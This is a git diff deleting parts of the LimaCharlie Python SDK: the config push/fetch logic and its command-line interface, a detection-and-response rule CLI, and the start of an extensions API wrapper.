-                        'sync_org_values' : isOrgConfigs,
-                        'sync_hives' : isHives,
-                        'sync_installation_keys' : isInstallationKeys,
-                        'sync_yara' : isYara,
-                    }, isImpersonate = True )
-
-                for op in data.get( 'ops', [] ):
-                    if op[ 'is_added' ]:
-                        yield ( '+', op[ 'type' ], op[ 'name' ] )
-                    if op[ 'is_removed' ]:
-                        yield ( '-', op[ 'type' ], op[ 'name' ] )
-                    if not op[ 'is_added' ] and not op[ 'is_removed' ]:
-                        yield ( '=', op[ 'type' ], op[ 'name' ] )
-                return
-            except:
-                print( "An error occurred while pushing changes to %s via the infrastructure-service, you may use the --use-local-logic flag if you want to proceed without the service" % ( self._man._oid, ) )
-                raise
-
-        if isResources:
-            currentResources = self._man.getSubscriptions()
-            for cat, confResources in asConf.get( 'resources', {} ).items():
-                if cat == 'service':
-                    # Alias Service to Replicant
-                    cat = 'replicant'
-                for resName in confResources:
-                    fullResName = '%s/%s' % ( cat, resName )
-                    if resName not in currentResources.get( cat, [] ):
-                        if not isDryRun:
-                            self._man.subscribeToResource( fullResName )
-                        yield ( '+', 'resource', fullResName )
-                    else:
-                        yield ( '=', 'resource', fullResName )
-            # Only force "resources" if it is present in the config.
-            # This avoids unexpected disabling of all configs.
-            if isForce and 'resources' in asConf:
-                for cat, catResources in currentResources.items():
-                    for resName in catResources:
-                        internalCat = cat
-                        if internalCat == 'replicant':
-                            # Alias replicant to service
-                            internalCat = 'service'
-                        if resName not in asConf.get( 'resources', {} ).get( internalCat, [] ):
-                            fullResName = '%s/%s' % ( cat, resName )
-                            if not isDryRun:
-                                self._man.unsubscribeFromResource( fullResName )
-                            yield ( '-', 'resource', fullResName )
-        
-        if isExtensions:
-            currentExtensions = list( Extension( self._man ).list() )
-            confExtensions = asConf.get( 'extensions', [] )
-            for ext in confExtensions:
-                if ext in currentExtensions:
-                    yield ( '=', 'extension', ext )
-                else:
-                    if not isDryRun:
-                        Extension( self._man ).subscribe( ext )
-                    yield ( '+', 'resource', fullResName )
-            # Only force "extensions" if it is present in the config.
-            # This avoids unexpected disabling of all configs.
-            if isForce and 'extensions' in asConf:
-                for ext in currentExtensions:
-                    if ext not in asConf.get( 'extensions', [] ):
-                        if not isDryRun:
-                            Extension( self._man ).unsubscribe( ext )
-                        yield ( '-', 'extension', ext )
-
-        if isOrgConfigs:
-            # Get the current configs, we will try not to push for no reason.
-            currentConfigs = self._getAllOrgConfigValues()
-
-            # Start by adding the configs with isReplace.
-            for confName, confValue in asConf.get( 'org-value', {} ).items():
-                # Check to see if it is already in the current configs and with the right value.
-                if confName in currentConfigs:
-                    if confValue == currentConfigs[ confName ]:
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'org-value', confName )
-                        continue
-                if not isDryRun:
-                    try:
-                        self._man.setOrgConfig( confName, confValue )
-                    except Exception as e:
-                        if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                            raise
-                yield ( '+', 'org-config', confName )
-
-            # If we are not told to isForce, this is it.
-            if isForce:
-                currentConfigs = self._getAllOrgConfigValues()
-
-                # Now if isForce was specified, list existing rules and remove the ones
-                # not in our list.
-                for confName, confValue in currentConfigs.items():
-                    if confName not in asConf.get( 'org-value', {} ):
-                        if not isDryRun:
-                            try:
-                                self._man.setOrgConfig( confName, "" )
-                            except Exception as e:
-                                if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                                    raise
-                        yield ( '-', 'org-value', confName )
-
-        if isRules:
-            # Check all the namespaces we have access to.
-            availableNamespaces = []
-            if self._man.testAuth( permissions = [ 'dr.list' ] ):
-                availableNamespaces.append( 'general' )
-            if self._man.testAuth( permissions = [ 'dr.list.managed' ] ):
-                availableNamespaces.append( 'managed' )
-            if self._man.testAuth( permissions = [ 'dr.list.replicant' ] ):
-                availableNamespaces.append( 'replicant' )
-
-            # Get the current rules, we will try not to push for no reason.
-            currentRules = {}
-            for namespace in availableNamespaces:
-                currentRules.update( { k : self._coreRuleContent( v ) for k, v in self._man.rules( namespace = namespace ).items() } )
-
-            # Start by adding the rules with isReplace.
-            for ruleName, rule in asConf.get( 'rules', {} ).items():
-                rule = self._coreRuleContent( rule )
-                ruleNamespace = rule.get( 'namespace', 'general' )
-                # Check to see if it is already in the current rules and in the right format.
-                previousNamespace = None
-                if ruleName in currentRules:
-                    previousNamespace = currentRules[ ruleName ].get( 'namespace', 'general' )
-                    if ( self._isJsonEqual( rule[ 'detect' ], currentRules[ ruleName ][ 'detect' ] ) and
-                         self._isJsonEqual( rule[ 'respond' ], currentRules[ ruleName ][ 'respond' ] ) and
-                         ruleNamespace == previousNamespace ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'rule', ruleName )
-                        continue
-                if not isDryRun:
-                    try:
-                        if previousNamespace is not None and ruleNamespace != previousNamespace:
-                            # Looks like the rule changed namespace.
-                            self._man.del_rule( ruleName, namespace = previousNamespace )
-                        self._man.add_rule( ruleName, rule[ 'detect' ], rule[ 'respond' ], isReplace = True, namespace = ruleNamespace )
-                    except Exception as e:
-                        if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                            raise
-                yield ( '+', 'rule', ruleName )
-
-            # If we are not told to isForce, this is it.
-            if isForce:
-                # Check all the namespaces we have access to.
-                currentRules = {}
-                for namespace in availableNamespaces:
-                    currentRules.update( self._man.rules( namespace = namespace ) )
-                # Now if isForce was specified, list existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in currentRules.items():
-                    # Ignore special service rules.
-                    if ruleName.startswith( '__' ):
-                        continue
-                    if ruleName not in asConf.get( 'rules', {} ):
-                        if not isDryRun:
-                            try:
-                                self._man.del_rule( ruleName, namespace = rule.get( 'namespace', 'general' ) )
-                            except Exception as e:
-                                if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                                    raise
-                        yield ( '-', 'rule', ruleName )
-
-        if isFPs:
-            # Get the current rules, we will try not to push for no reason.
-            currentRules = { k : self._coreFPContent( v ) for k, v in self._man.fps().items() }
-
-            # Start by adding the rules with isReplace.
-            for ruleName, rule in asConf.get( 'fps', {} ).items():
-                rule = self._coreFPContent( rule )
-                # Check to see if it is already in the current rules and in the right format.
-                if ruleName in currentRules:
-                    if self._isJsonEqual( rule[ 'data' ], currentRules[ ruleName ][ 'data' ] ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'fp', ruleName )
-                        continue
-                if not isDryRun:
-                    try:
-                        self._man.add_fp( ruleName, rule[ 'data' ], isReplace = True )
-                    except Exception as e:
-                        if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                            raise
-                yield ( '+', 'fp', ruleName )
-
-            # If we are not told to isForce, this is it.
-            if isForce:
-                currentRules = self._man.fps()
-
-                # Now if isForce was specified, list existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in currentRules.items():
-                    # Ignore special service rules.
-                    if ruleName not in asConf.get( 'fps', {} ):
-                        if not isDryRun:
-                            try:
-                                self._man.del_fp( ruleName )
-                            except Exception as e:
-                                if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                                    raise
-                        yield ( '-', 'fp', ruleName )
-
-        if isOutputs:
-            # Get the current outputs, we will try not to push for no reason.
-            currentOutputs = { k : self._coreOutputContent( v ) for k, v in self._man.outputs().items() }
-
-            for outputName, output in asConf.get( 'outputs', {} ).items():
-                if outputName in currentOutputs:
-                    if self._isJsonEqual( output, currentOutputs[ outputName ] ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'output', outputName )
-                        continue
-                if not isDryRun:
-                    try:
-                        self._man.add_output( outputName, output[ 'module' ], output[ 'for' ], **{ k : v for k, v in output.items() if k not in ( 'module', 'for', 'name' ) } )
-                    except Exception as e:
-                        if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                            raise
-                yield ( '+', 'output', outputName )
-
-            if isForce:
-                # Now if isForce was specified, list the existing outputs and remove the ones
-                # not in our list.
-                for outputName, output in self._man.outputs().items():
-                    if output.get( 'is_delete_on_failure', 'false' ) == 'true':
-                        # Delete on failure is associated with temporary
-                        # outputs so we won't consider them.
-                        continue
-                    if outputName not in asConf.get( 'outputs', {} ):
-                        if not isDryRun:
-                            try:
-                                self._man.del_output( outputName )
-                            except Exception as e:
-                                if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                                    raise
-                        yield ( '-', 'output', outputName )
-
-        if isIntegrity:
-            integrityService = Integrity( self._man )
-            currentIntegrityRules = { k : self._coreIntegrityContent( v ) for k, v in integrityService.getRules().items() }
-
-            for ruleName, rule in asConf.get( 'integrity', {} ).items():
-                if ruleName in currentIntegrityRules:
-                    if self._isJsonEqual( rule, currentIntegrityRules[ ruleName ] ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'integrity', ruleName )
-                        continue
-                if not isDryRun:
-                    try:
-                        integrityService.addRule( ruleName,
-                                                    patterns = rule[ 'patterns' ],
-                                                    tags = rule.get( 'tags', [] ),
-                                                    platforms = rule.get( 'platforms', [] ) )
-                    except Exception as e:
-                        if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                            raise
-                yield ( '+', 'integrity', ruleName )
-
-            if isForce:
-                # Now if isForce was specified, list the existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in integrityService.getRules().items():
-                    if ruleName not in asConf.get( 'integrity', {} ):
-                        if not isDryRun:
-                            try:
-                                integrityService.removeRule( ruleName )
-                            except Exception as e:
-                                if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                                    raise
-                        yield ( '-', 'integrity', ruleName )
-
-        if isArtifact:
-            artifactService = Logging( self._man )
-            currentartifactRules = { k : self._coreLoggingContent( v ) for k, v in artifactService.getRules().items() }
-            for ruleName, rule in asConf.get( 'artifact', {} ).items():
-                if ruleName in currentartifactRules:
-                    if self._isJsonEqual( rule, currentartifactRules[ ruleName ] ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'artifact', ruleName )
-                        continue
-                if not isDryRun:
-                    try:
-                        artifactService.addRule( ruleName,
-                                                patterns = rule[ 'patterns' ],
-                                                tags = rule.get( 'tags', [] ),
-                                                platforms = rule.get( 'platforms', [] ),
-                                                isDeleteAfter = rule.get( 'is_delete_after', False ),
-                                                isIgnoreCert = rule.get( 'is_ignore_cert', False ) )
-                    except Exception as e:
-                        if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                            raise
-                yield ( '+', 'artifact', ruleName )
-
-            if isForce:
-                # Now if isForce was specified, list the existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in artifactService.getRules().items():
-                    if ruleName not in asConf.get( 'artifact', {} ):
-                        if not isDryRun:
-                            try:
-                                artifactService.removeRule( ruleName )
-                            except Exception as e:
-                                if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                                    raise
-                        yield ( '-', 'artifact', ruleName )
-
-        if isExfil:
-            exfilService = Exfil( self._man )
-            currentExfilRules = exfilService.getRules()
-            for ruleName, rule in asConf.get( 'exfil', {} ).get( 'watch', {} ).items():
-                if ruleName in currentExfilRules.get( 'watch', {} ):
-                    if self._isJsonEqual( rule, self._coreExfilContent( currentExfilRules[ 'watch' ][ ruleName ] ) ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'exfil-watch', ruleName )
-                        continue
-                if not isDryRun:
-                    try:
-                        exfilService.addWatchRule( ruleName,
-                                                    event = rule[ 'event' ],
-                                                    operator = rule[ 'operator' ],
-                                                    value = rule[ 'value' ],
-                                                    path = rule[ 'path' ],
-                                                    tags = rule.get( 'tags', [] ),
-                                                    platforms = rule.get( 'platforms', [] ) )
-                    except Exception as e:
-                        if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                            raise
-                yield ( '+', 'exfil-watch', ruleName )
-
-            for ruleName, rule in asConf.get( 'exfil', {} ).get( 'list', {} ).items():
-                if ruleName in currentExfilRules.get( 'list', {} ):
-                    if self._isJsonEqual( rule, self._coreExfilContent( currentExfilRules[ 'list' ][ ruleName ] ) ):
-                        # Exact same, no point in pushing.
-                        yield ( '=', 'exfil-list', ruleName )
-                        continue
-                if not isDryRun:
-                    try:
-                        exfilService.addEventRule( ruleName,
-                                                    events = rule[ 'events' ],
-                                                    tags = rule.get( 'tags', [] ),
-                                                    platforms = rule.get( 'platforms', [] ) )
-                    except Exception as e:
-                        if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                            raise
-                yield ( '+', 'exfil-list', ruleName )
-
-            if isForce:
-                # Now if isForce was specified, list the existing rules and remove the ones
-                # not in our list.
-                for ruleName, rule in exfilService.getRules().get( 'watch', {} ).items():
-                    if ruleName not in asConf.get( 'exfil', {} ).get( 'watch', {} ):
-                        if not isDryRun:
-                            try:
-                                exfilService.removeWatchRule( ruleName )
-                            except Exception as e:
-                                if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                                    raise
-                        yield ( '-', 'exfil-watch', ruleName )
-                for ruleName, rule in exfilService.getRules().get( 'list', {} ).items():
-                    if ruleName not in asConf[ 'exfil' ].get( 'list', {} ):
-                        if not isDryRun:
-                            try:
-                                exfilService.removeEventRule( ruleName )
-                            except Exception as e:
-                                if not self._ignoreLockErrors( e, isIgnoreInaccessible ):
-                                    raise
-                        yield ( '-', 'exfil-list', ruleName )
-
-    def _loadEffectiveConfig( self, configFile ):
-        configFile = os.path.abspath( configFile )
-        with open( configFile, 'rb' ) as f:
-            asConf = yaml.safe_load( f.read().decode() )
-        if asConf is None:
-            asConf = {}
-        if 'version' not in asConf:
-            raise LcConfigException( 'Version not found.' )
-        if self._confVersion < asConf[ 'version' ]:
-            raise LcConfigException( 'Version not supported.' )
-
-        # Config files are always evaluated relative to the current one.
-        contextPath = os.path.dirname( configFile )
-        currentPath = os.getcwd()
-        os.chdir( contextPath )
-        try:
-            includes = asConf.get( 'include', [] )
-            if _isStringCompat( includes ):
-                includes = [ includes ]
-            globIncludes = set()
-            for include in includes:
-                hasNewFiles = False
-                for globbed in glob.iglob( include, recursive=True ):
-                    globIncludes.add( globbed )
-                    hasNewFiles = True
-                if ('?' not in include and '*' not in include) and not hasNewFiles:
-                    # This pattern has no wildcard and did not match a file, this is likely a mistake.
-                    raise LcConfigException( 'No files matched the include glob %s' % ( include, ) )
-            includes = list( globIncludes )
-            totalIncludes = list( globIncludes )
-            for include in includes:
-                if not _isStringCompat( include ):
-                    raise LcConfigException( 'Include should be a string, not %s' % ( str( type( include ) ), ) )
-
-                subConf, newIncludes = self._loadEffectiveConfig( include )
-                totalIncludes.extend( newIncludes )
-
-                for cat in self._configRoots:
-                    subCat = subConf.get( cat, None )
-                    if subCat is None:
-                        continue
-                    # Check if this config is dictionaries
-                    # or lists. They need to be updated differntly.
-                    if isinstance( subCat, list ):
-                        asConf.setdefault( cat, [] ).extend( subCat )
-                    elif len( subCat ) != 0 and isinstance( list( subCat.values() )[ 0 ], ( list, tuple ) ):
-                        for k, v in subCat.items():
-                            for val in v:
-                                if val in asConf.setdefault( cat, {} ).setdefault( k, [] ):
-                                    continue
-                                asConf[ cat ][ k ].append( val )
-                    else:
-                        # One more special case for exfil.
-                        if cat in ('exfil', 'hives'):
-                            for k, v in subCat.items():
-                                asConf.setdefault( cat, {} ).setdefault( k, {} ).update( v )
-                        else:
-                            asConf.setdefault( cat, {} ).update( subCat )
-        finally:
-            # Revert the previous CWD.
-            os.chdir( currentPath )
-
-        return asConf, totalIncludes
-
-def main( sourceArgs = None ):
-    import argparse
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie configs' )
-    parser.add_argument( 'action',
-                         type = lambda x: str( x ).lower().strip(),
-                         help = 'the action to perform, one of "fetch" or "push".' )
-    parser.add_argument( '-o', '--oid',
-                         type = lambda x: str( uuid.UUID( x.strip() ) ),
-                         required = False,
-                         dest = 'oid',
-                         default = None,
-                         help = 'the OID to authenticate as, if not specified global creds will be used.' )
-    parser.add_argument( '-e', '--environment',
-                         type = str,
-                         required = False,
-                         dest = 'environment',
-                         default = None,
-                         help = 'the name of the LimaCharlie environment (as defined in ~/.limacharlie) to use, otherwise global creds will be used.' )
-    parser.add_argument( '-f', '--force',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isForce',
-                         help = 'if specified, in a push will remove all rules not in the config file' )
-    parser.add_argument( '-i', '--ignore-inaccessible',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isIgnoreInaccessible',
-                         help = 'if specified, in a push will ignore inaccessible (locked) resources even if --force is specified' )
-    parser.add_argument( '--dry-run',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isDryRun',
-                         help = 'if specified, in a push simulates the push without making any changes.' )
-    parser.add_argument( '--rules',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isRules',
-                         help = 'if specified, apply D&R rules from operations' )
-    parser.add_argument( '--fp',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isFPs',
-                         help = 'if specified, apply False Positive rules from operations' )
-    parser.add_argument( '--outputs',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isOutputs',
-                         help = 'if specified, apply Outputs from operations' )
-    parser.add_argument( '--integrity',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isIntegrity',
-                         help = 'if specified, apply Integrity Service from operations' )
-    parser.add_argument( '--artifact',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isArtifact',
-                         help = 'if specified, apply Artifact Service from operations' )
-    parser.add_argument( '--exfil',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isExfil',
-                         help = 'if specified, apply Exfil Service from operations' )
-    parser.add_argument( '--resources',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isResources',
-                         help = 'if specified, apply resource subscriptions from operations' )
-    parser.add_argument( '--extensions',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isExtensions',
-                         help = 'if specified, apply extension subscriptions from operations' )
-    parser.add_argument( '--org-configs',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isOrgConfigs',
-                         help = 'if specified, apply org configs from operations' )
-    parser.add_argument( '--installation-keys',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isInstallationKeys',
-                         help = 'if specified, apply Installation Keys from operations' )
-    parser.add_argument( '--yara',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isYara',
-                         help = 'if specified, apply Yara Sources and Rules from operations' )
-    parser.add_argument( '--hive-dr-general',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveDRGeneral',
-                         help = 'if specified, apply D&R rules in the general hive from operations' )
-    parser.add_argument( '--hive-dr-managed',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveDRManaged',
-                         help = 'if specified, apply D&R rules in the managed hive from operations' )
-    parser.add_argument( '--hive-dr-service',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveDRService',
-                         help = 'if specified, apply D&R rules in the service hive from operations' )
-    parser.add_argument( '--hive-fp',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveFP',
-                         help = 'if specified, apply FP rules in the general hive from operations' )
-    parser.add_argument( '--hive-cloud-sensor',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveCloudSensor',
-                         help = 'if specified, apply cloud sensors in hive from operations' )
-    parser.add_argument( '--hive-extension-config',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveExtensionConfig',
-                         help = 'if specified, apply extension configs in hive from operations' )
-    parser.add_argument( '--hive-yara',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveYara',
-                         help = 'if specified, apply yara rules in hive from operations' )
-    parser.add_argument( '--hive-lookup',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveLookup',
-                         help = 'if specified, apply lookups in hive from operations' )
-    parser.add_argument( '--hive-secret',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveSecret',
-                         help = 'if specified, apply secrets in hive from operations' )
-    parser.add_argument( '--hive-query',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveQuery',
-                         help = 'if specified, apply queries in hive from operations' )
-    parser.add_argument( '--hive-playbook',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHivePlaybook',
-                         help = 'if specified, apply playbooks in hive from operations' )
-    parser.add_argument( '--hive-ai-agent',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveAiAgent',
-                         help = 'if specified, apply AI agents in hive from operations' )
-    parser.add_argument( '--hive-external-adapter',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isHiveExternalAdapter',
-                         help = 'if specified, apply external adapters in hive from operations' )
-    parser.add_argument( '--all',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isAll',
-                         help = 'if specified, apply all configs from operations' )
-    parser.add_argument( '-c', '--config',
-                         type = str,
-                         default = 'lc_conf.yaml',
-                         required = False,
-                         dest = 'config',
-                         help = 'path to the lc_conf.yaml file to use' )
-    parser.add_argument( '--verbose',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isVerbose',
-                         help = 'if specified, emit verbose information about the push' )
-    parser.add_argument( '--use-local-logic',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isDontUseInfraService',
-                         help = 'if specified, use the local SDK syncing logic instead of cloud service' )
-    parser.add_argument( '--use-infra-extension',
-                         required = False,
-                         default = False,
-                         action = 'store_true',
-                         dest = 'isUseExtension',
-                         help = 'if specified, use the infrastructure extension instead of the service' )
-    args = parser.parse_args( sourceArgs )
-
-    if args.isDryRun:
-        print( '!!! DRY RUN !!!' )
-
-    if args.action not in ( 'fetch', 'push' ):
-        print( "Action %s is not supported." % args.action )
-        sys.exit( 1 )
-
-    resTypes = [
-        'isRules',
-        'isFPs',
-        'isOutputs',
-        'isIntegrity',
-        'isArtifact',
-        'isExfil',
-        'isResources',
-        'isExtensions',
-        'isOrgConfigs',
-        'isInstallationKeys',
-        'isYara',
-        'isHiveDRGeneral',
-        'isHiveDRManaged',
-        'isHiveDRService',
-        'isHiveFP',
-        'isHiveCloudSensor',
-        'isHiveExtensionConfig',
-        'isHiveYara',
-        'isHiveLookup',
-        'isHiveSecret',
-        'isHiveQuery',
-        'isHivePlaybook',
-        'isHiveAiAgent',
-        'isHiveExternalAdapter',
-    ]
-
-    allHives = {
-        'dr-general': True,
-        'dr-managed': True,
-        'dr-service': True,
-        'fp': True,
-        'cloud_sensor': True,
-        'extension_config': True,
-        'yara': True,
-        'lookup': True,
-        'secret': True,
-        'query': True,
-        'playbook': True,
-        'ai_agent': True,
-        'external_adapter': True,
-    }
-
-    # If All is enabled, enable all types.
-    if args.isAll:
-        for k in resTypes:
-            setattr( args, k, True )
-        setattr( args, 'isHives', allHives )
-
-    # Check at least one type is specified, otherwise
-    # it's probably a mistake.
-    for k in resTypes:
-        if getattr( args, k ):
-            break
-    else:
-        print( 'No config types specified, nothing to do!' )
-        sys.exit( 1 )
-
-    hives = {}
-    if args.isHiveDRGeneral:
-        hives['dr-general'] = True
-    if args.isHiveDRManaged:
-        hives['dr-managed'] = True
-    if args.isHiveDRService:
-        hives['dr-service'] = True
-    if args.isHiveCloudSensor:
-        hives['cloud_sensor'] = True
-    if args.isHiveFP:
-        hives['fp'] = True
-    if args.isHiveExtensionConfig:
-        hives['extension_config'] = True
-    if args.isHiveYara:
-        hives['yara'] = True
-    if args.isHiveLookup:
-        hives['lookup'] = True
-    if args.isHiveSecret:
-        hives['secret'] = True
-    if args.isHiveQuery:
-        hives['query'] = True
-    if args.isHivePlaybook:
-        hives['playbook'] = True
-    if args.isHiveAiAgent:
-        hives['ai_agent'] = True
-    if args.isHiveExternalAdapter:
-        hives['external_adapter'] = True
-
-    s = Configs( oid = args.oid, env = args.environment, isDontUseInfraService = args.isDontUseInfraService, isUseExtension = args.isUseExtension )
-
-    if 'fetch' == args.action:
-        s.fetch( args.config, isRules = args.isRules, isFPs = args.isFPs, isOutputs = args.isOutputs, isIntegrity = args.isIntegrity, isArtifact = args.isArtifact, isExfil = args.isExfil, isResources = args.isResources, isExtensions = args.isExtensions, isOrgConfigs = args.isOrgConfigs, isInstallationKeys = args.isInstallationKeys, isHives = hives, isYara = args.isYara )
-    elif 'push' == args.action:
-        for modification, category, element in s.push( args.config, isForce = args.isForce, isIgnoreInaccessible = args.isIgnoreInaccessible, isDryRun = args.isDryRun, isRules = args.isRules, isFPs = args.isFPs, isOutputs = args.isOutputs, isIntegrity = args.isIntegrity, isArtifact = args.isArtifact, isExfil = args.isExfil, isResources = args.isResources, isExtensions = args.isExtensions, isOrgConfigs = args.isOrgConfigs, isInstallationKeys = args.isInstallationKeys, isHives = hives, isYara = args.isYara, isVerbose = args.isVerbose ):
-            print( '%s %s %s' % ( modification, category, element ) )
-
-if __name__ == '__main__':
-    main()
diff --git a/limacharlie/DRCli.py b/limacharlie/DRCli.py
deleted file mode 100644
index e0811a70..00000000
--- a/limacharlie/DRCli.py
+++ /dev/null
@@ -1,100 +0,0 @@
-from limacharlie import Manager
-import yaml
-import sys
-
-def printData( data ):
-    if isinstance( data, str ):
-        print( data )
-    else:
-        print( yaml.safe_dump( data, default_flow_style = False ) )
-
-def reportError( msg ):
-    sys.stderr.write( msg + '\n' )
-    sys.exit( 1 )
-
-def do_list( args ):
-    rules = Manager( None, None ).rules( args.namespace )
-    for rule in rules.values():
-        rule.pop( 'detect', None )
-        rule.pop( 'respond', None )
-        rule.pop( 'name', None )
-        rule.pop( 'oid', None )
-    printData( { ruleName: rule for ruleName, rule in rules.items() if not ruleName.startswith( '_' ) } )
-
-def do_get( args ):
-    if args.ruleName is None:
-        reportError( 'No rule name specified.' )
-    rule = Manager( None, None ).rules( args.namespace ).get( args.ruleName, None )
-    if rule is None:
-        reportError( 'Rule not found.' )
-    printData( rule )
-
-def do_add( args ):
-    ruleFile = args.ruleFile
-    if ruleFile is None:
-        reportError( 'No rule file not specified.' )
-    try:
-        with open( ruleFile, 'rb' ) as f:
-            ruleFile = yaml.safe_load( f.read() )
-    except Exception as e:
-        reportError( 'Error reading rule file yaml: %s' % e )
-    detect = ruleFile.get( 'detect', None )
-    if detect is None:
-        reportError( 'No detect component in rule file.' )
-    response = ruleFile.get( 'respond', None )
-    if response is None:
-        reportError( 'No respond component in rule file.' )
-    Manager( None, None ).add_rule( args.ruleName, detect, response, args.isReplace, namespace = args.namespace )
-    printData( 'Added' )
-
-def do_remove( args ):
-    Manager( None, None ).del_rule( args.ruleName, namespace = args.namespace )
-    printData( 'Removed' )
-
-def main( sourceArgs = None ):
-    import argparse
-
-    actions = {
-        'list' : do_list,
-        'get' : do_get,
-        'add' : do_add,
-        'remove' : do_remove,
-    }
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie dr' )
-    parser.add_argument( 'action',
-                         type = str,
-                         help = 'the action to take, one of: %s' % ( ', '.join( actions.keys(), ) ) )
-
-    parser.add_argument( '-r', '--rule-name',
-                         type = str,
-                         required = False,
-                         dest = 'ruleName',
-                         default = None,
-                         help = 'the name of the rule.' )
-
-    parser.add_argument( '-f', '--rule-file',
-                         default = None,
-                         required = False,
-                         dest = 'ruleFile',
-                         help = 'the file path holding the rule content.' )
-
-    parser.add_argument( '-n', '--namespace',
-                         default = None,
-                         required = False,
-                         dest = 'namespace',
-                         help = 'the namespace to use.' )
-
-    parser.add_argument( '--replace',
-                         action = 'store_true',
-                         default = False,
-                         required = False,
-                         dest = 'isReplace',
-                         help = 'replace the rule by that name if it already exists.' )
-
-    args = parser.parse_args( sourceArgs )
-
-    actions[ args.action.lower() ]( args )
-
-if '__main__' == __name__:
-    main()
\ No newline at end of file
diff --git a/limacharlie/Extensions.py b/limacharlie/Extensions.py
deleted file mode 100644
index d3e05159..00000000
--- a/limacharlie/Extensions.py
+++ /dev/null
@@ -1,394 +0,0 @@
-from limacharlie import Manager
-from limacharlie import Hive
-import json
-import gzip
-import base64
-
-from .utils import POST
-from .utils import DELETE
-from .utils import GET
-from .utils import PUT
-from .utils import PATCH
-from .utils import LcApiException
-
-class Extension( object ):
-    def __init__( self, manager ):
-        self._manager = manager
-
-    def list( self ):
-        return self._manager._apiCall( 'orgs/%s/subscriptions' % ( self._manager._oid, ), GET )
-
-    def subscribe( self, extName ):
-        return self._manager._apiCall( 'orgs/%s/subscription/extension/%s' % ( self._manager._oid, extName, ), POST, {} )
-
-    def unsubscribe( self, extName ):
-        return self._manager._apiCall( 'orgs/%s/subscription/extension/%s' % ( self._manager._oid, extName, ), DELETE, {} )
-    
-    def rekey( self, extName ):
-        return self._manager._apiCall( 'orgs/%s/subscription/extension/%s' % ( self._manager._oid, extName, ), PATCH, {} )
-
-    def getAll( self ):
-        return self._manager._apiCall( 'extension/definition', GET, {} )
-
-    def create( self, extObj ):
-        return self._manager._apiCall( 'extension/definition', POST, {}, rawBody = json.dumps( extObj ).encode(), contentType = 'application/json' )
-    
-    def update( self, extObj ):
-        return self._manager._apiCall( 'extension/definition', PUT, {}, rawBody = json.dumps( extObj ).encode(), contentType = 'application/json' )
-    
-    def get( self, extName ):
-        return self._manager._apiCall( 'extension/definition/%s' % ( extName, ), GET )
-    
-    def delete( self, extName ):
-        return self._manager._apiCall( 'extension/definition/%s' % ( extName, ), DELETE )
-    
-    def getSchema( self, extName ):
-        return self._manager._apiCall( 'extension/schema/%s' % ( extName, ), GET, queryParams = {
-            'oid' : self._manager._oid,
-        } )
-    
-    def migrate( self, extName ):
-        return self._manager._apiCall( 'extension/migrate/%s' % ( extName, ), POST, {
-            'oid' : self._manager._oid,
